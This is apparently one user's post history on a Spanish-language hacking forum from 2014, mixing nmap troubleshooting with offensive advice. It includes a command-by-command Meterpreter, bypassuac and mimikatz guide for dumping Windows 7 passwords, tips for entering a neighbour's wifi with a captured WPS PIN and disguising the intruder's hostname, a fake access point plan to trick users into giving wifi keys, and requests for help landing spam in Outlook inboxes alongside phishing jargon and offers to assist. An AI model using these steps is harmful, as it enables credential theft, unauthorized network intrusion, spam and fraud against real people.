Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - Typh0n

Páginas: [1]
1
Dudas y pedidos generales / Re:Nmap en VPS
« en: Mayo 03, 2014, 04:18:10 pm »
Lo estas ejecutando como root o como usuario sin permisos? prueba ejecuntandolo con SUDO

Eres dueño del VPS? si es asi verifica iptables.


Saludos.

 Gn0m3

Si como root, y he desactivado iptables pero sigue sin funcionar ...  :-\

2
Dudas y pedidos generales / Re:Duda importante de REAVER
« en: Mayo 03, 2014, 03:52:40 pm »
Exactamente a mi me paso lo mismo con un vecino que cambio la clave, pero antes de eso le active el WPS, y apunte el pin, solo tienes que especificar con el parametro
-p seguido de esto el pin, algo asi.

Código: [Seleccionar]
reaver -i mon0 -c 1 -b 00:11:22:33:44:55 -p 12345678
PD: probablemente se haya dado cuenta que has entrado a su wifi, te recomiendo no usar el DHCP, y tratar de cambiar tu hostname por uno similar a los de android, por ejemplo android-b1490175c84ahb1.

en linux puedes hacerlo en el archivo /etc/hostname, en WinX equipo, propiedades, configuración de nombre y luego en el nombre de la maquina, saludos.

3
Dudas y pedidos generales / Re:Nmap en VPS
« en: Mayo 02, 2014, 10:04:04 pm »
Hola Typh0n,
Tal y como sugiere el mensaje del nmap, has probado con la opción -Pn??

Código: [Seleccionar]
-Pn: Treat all hosts as online -- skip host discovery
Por otro lado incluí por favor la secuencia de opciones / comandos que estas usando Ej:  Nmap -PR 192.168.1.1

Saludos

Gn0m3

Es como si algo bloquease el nmap, no funciona con ninguna opcion ni con un :

Código: [Seleccionar]
nmap ip
nmap -sP ip
nmap -Pn ip

Es : Ubuntu 12.04 x86


4
Dudas y pedidos generales / [SOLUCIONADO] Nmap en VPS
« en: Mayo 02, 2014, 09:54:46 pm »
Buenas acabo de instalar nmap en un vps

y cada vez que quiero escanear una ip me tira el siguiente resultado

Código: [Seleccionar]
Starting Nmap 6.25 ( http://nmap.org ) at 2014-05-02 20:50 EDT
Initiating ARP Ping Scan at 20:50
Scanning 190.234.x.x [1 port]
Completed ARP Ping Scan at 20:50, 0.42s elapsed (1 total hosts)
Nmap scan report for 190.234.x.x [host down]
Read data files from: /usr/local/bin/../share/nmap
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 0.48 seconds
           Raw packets sent: 2 (56B) | Rcvd: 0 (0B)

A pesar de que "hay ping", recibo este mensaje alguien tiene idea de porque ?

PD: Linux Typh0n 2.6.32-042stab084.20 #1 SMP Mon Jan 27 00:40:08 MSK 2014 i686 i686 i386 GNU/Linux

5
Dudas y pedidos generales / Re:Archivo Perl Symlink
« en: Mayo 02, 2014, 09:53:03 pm »
Si es que se descarga o se muestra, cabe la posibilidad de que no puedas ejecutar este tipo de scripts, el interprete esta en otra ruta, no este instalado etc.

6
Dudas y pedidos generales / Re:Correos al inbox en hotmail (outlook)
« en: Abril 24, 2014, 03:59:35 am »
Hola Typh0n,
Que script estas utilizando? cuéntanos así vemos los parámetros para ver de ayudarte?

Saludos

Gn0m3

Hola estuve probando con sendblaster que es un software para envio de correos, tambien probe con un mailer smtp, pero aun nada, imagino que se debe a la configuracion de ese parametro .

7
Bueno amigos estoy investigando en esto del "spam" al inbox, en gmail no tengo problemas ya que hasta con un simple script en php llega al inbox, en donde si me parece complicado en en outlook, acabo de conseguir un cpanel donde cree una cuenta de correo para intentar con una cuenta smtp y obtengo el siguiente resultado (código del correo)

Código: [Seleccionar]
Authentication-Results: hotmail.com; spf=softfail
X-AUTH-Result: FAIL
X-SID-Result: FAIL

como vi eso de spf, lo active en el cpanel junto con el de domainkeys, y al finalizar se activaron correctamente pero nuevamente me vuelve a aparecer softfail, haber si alguien me da una mano con esto
la ip no esta en listas negras ...

PD: estoy usando sendblaster para los envios de correos con la cuenta smtp ...

8
Dudas y pedidos generales / Re:Análisis Phishing Bancario
« en: Marzo 11, 2014, 05:57:53 pm »
No es muy difícil amigo, ahí te envie un MP, si deseas me avisas y te doy una mano  :)

9
Dudas y pedidos generales / Re:Análisis Phishing Bancario
« en: Marzo 11, 2014, 03:25:42 pm »
Algunos terminos que se manejan en el mundo del cyber crimen, en cuanto al phishing.

A la pagina clonada se le dice SCAM, al la web donde se alojara se le dice shell o cpanel (solo por el simple hecho de que en la web "hackeada", se obtuvo acceso al cpanel o se subió una web shell), el archivo con el que se envía spam es un mailer y muchas veces solo es cuestión de ver el código del correo para saber de donde vino, y ademas lo mas seguro es que no sea del mismo servidor donde esta alojado el scam, luego tendrías que hacer click para ver a donde seras redireccionado a "www.cualquierweb.com/TUBANCO.COM/DETALLES/CUENTAS/" por ejemplo, si quisieras podrias denunciar el scam o quizas hubiese la posibilidad de obtener acceso al servidor para tratar de localizar los correos a donde llegara los logs bueno eso depende del que audita ..


Saludos

10
Dudas y pedidos generales / [SOLUCIONADO] Que tipo de red es esta ?
« en: Marzo 11, 2014, 06:29:28 am »
Resulta que me conecto varias red con essid similares vendedor1,vendedor2,vendor3 (todos con la misma contraseña), WPA, y cuando entro al panel del router 192.168.1.1 y veo la parte de wireless veo que tiene un nombre WLAN_XXX por ejemplo y ninguno de los de arriba, ademas con nmap no hay ningun otra ip que pueda ser un router o algo asi, como se maneja este tipo de redes ?


PD: tengo conexion a internet ..

11
Hacking / Meterpreter + mimikatz
« en: Marzo 05, 2014, 05:52:00 am »

En esta pequeña guía les mostrare como obtener la contraseña de un Windows 7.

Cuando tenemos una sesión con meterpreter y queremos elevar privilegio lo normal es hacer uso de

Código: Bash
  1. getsystem
o también

Código: Bash
  1. hashdump
pero este ultimo nos arroja los hashes y desencriptarlo puede ser un problema (tiempo).

Si hicieramos uso de getsystem posiblemente obtengamos este error:



Esto es porque para poder ejecutar mimikatz con una shell (cmd), necesitamos privilegios, descargamos http://blog.gentilkiwi.com/mimikatz, lo que no interesa es la aplicacion de 32 bits, dentro del directorio Win32



ya que tratandose de un Windows 7 de 32 bits obviamente haremos uso de ello.

subimos mimikatz.exe con el comando upload



lo siguiente es lanzar una shell

Código: Bash
  1. shell

y posteriormente ejecutar mimikatz.exe con los comandos propios de la aplicación.

Código: Bash
  1. privilege::debug
  2. sekurlsa::logonPasswords full

Nos saldrá este error esto por el tema de privilegios



Para ello haremos uso de este exploit "exploit/windows/local/bypassuac", pero antes tenemos que enviar la sesion a background con el mismo comando.

Código: Bash
  1. background



Luego lanzamos el exploit con la sesion del Windows 7 en este caso la primera

Código: Bash
  1. use exploit/windows/local/bypassuac
  2. set SESSION 1
  3. exploit



Luego habremos obtenido una segunda sesión con privilegios de administrador, hacemos uso de ella con

Código: Bash
  1. sessions -i 2

nos damos cuenta que tenemos maximos privilegios con el comando

Código: Bash
  1. getuid



Finalmente lanzamos la shell y ejecutamos mimikatz.exe



Eso es todo Saludos  :)


12
Dudas y pedidos generales / Re:ERROR SQLI
« en: Marzo 02, 2014, 05:08:02 am »
me parece que el sitio web tiene un WAF, y esta bloqueando las inyecciones.


Código: [Seleccionar]
wafw00f http://www.sitioweb.com
con esa tool te sacaras de dudas (viene en kali linux tb en bakctrack)

13
Dudas y pedidos generales / Re:Ayuda kali linux
« en: Febrero 28, 2014, 05:39:20 am »
Has instalado Kali en una maquina virtual ?, intenta ejecutar

Código: [Seleccionar]
airmong-ng
para ver si te reconoce la tarjeta de red

14
Manuales y libros / Re:Servidor proxy con squid en linux by arthusu
« en: Enero 19, 2014, 12:08:07 am »
Excelente manual  ;D

15
Dudas y pedidos generales / Re:ayuda para encontrar "airdecrypt"
« en: Enero 10, 2014, 12:56:46 pm »
Nadie .... o al menos otra tool aparte de wireshark para capturar todo el trafico algo asi en modo texto y guardarlo en un .cap, para visualizarlo con network-miner

16
Seguridad Wireless / Re:Ataques contra userpass routers
« en: Enero 05, 2014, 03:32:21 pm »
también puedes probar lo de la MAC "invertida"


haces un arp -a

tomas la mac del router

11:22:33:44:55:66

y lo pones de la siguiente manera

221144336655

en caso sea alfanumérica pones todo con mayúscula y sin los ":"

Saludos

17
Seguridad Wireless / Re:REAVER
« en: Enero 05, 2014, 08:31:32 am »
tengo una duda con reaver, hace un tiempo auditando una red wep, me di con la sopresa con (nmap) que habia una red wpa dentro de la red algo asi..

habian 2 ips


192.168.1.1 (esta te llevaba a una subred y obviamente tenia un panel web del router)
192.168.1.2 (esta era otra subred esta era la WEP y la de arriba la WPA), pero cuando yo me conectaba usaba una ip 192.168.1.x entonces como podia entrar a los 2 paneles invirtiendo la mac me di cuenta que la red wpa era una que siempre quise crackear porque tenia buen alcanze. (no se me ocurría nada) y un día pensando en reaver veía que desde el panel podía generar el WPS entonces genere y lo intente de recuperar con reaver, funciono con el WEP mas no con el WPA se quedaba en una especie de bucle, entonces no todos los routers con wps son vunerables ?  ::)

18
Dudas y pedidos generales / Re:Ayuda con una red Wpa2-psk
« en: Enero 05, 2014, 08:27:35 am »
Hola te digo que es casi imposible crackear wpa, lo que puedes hacer es ver si hay algún conectado desautenticarlo, montar un fake ap y hacer que se conecte al tuyo, luego con ingeniería social hacer una web donde le pidas la clave del wifi y listo.


19
Bueno amigos muchos hemos visto el post de chema sobre


hackeando-al-vecino-hax0r-que-me-roba-la-wifi

http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html

en una parte menciona que captura el trafico de la red con airdecrypt en backtrack, hasta ahora no logro dar con el es posible que se haya equivocado de nombre, imagino que es una tool que guarda todo el trafico en un .cap para luego analizarlo ...

Saludos

20
Excelente, también pueden usar (wget)


wget -r http://www.abc.com


y se descargar la web de forma recursiva saludos ..

Páginas: [1]